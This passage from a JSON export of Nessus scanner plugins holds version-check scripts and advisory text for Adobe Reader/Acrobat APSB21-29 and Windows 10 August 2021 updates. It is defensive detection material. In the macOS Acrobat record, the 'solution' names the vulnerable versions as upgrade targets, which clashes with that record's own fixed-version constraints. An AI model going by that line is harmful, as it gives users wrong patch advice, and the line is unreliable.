(CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149379", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149379);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a 
version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Reader', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:04:19", "description": "The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 
(CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149381", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149381);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed 
on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30194 / 2020.001.30020 / 2021.001.20150 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Acrobat');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:24", "description": "The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. 
(CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149380", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149380);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. (CVE-2021-28557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Acrobat', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # 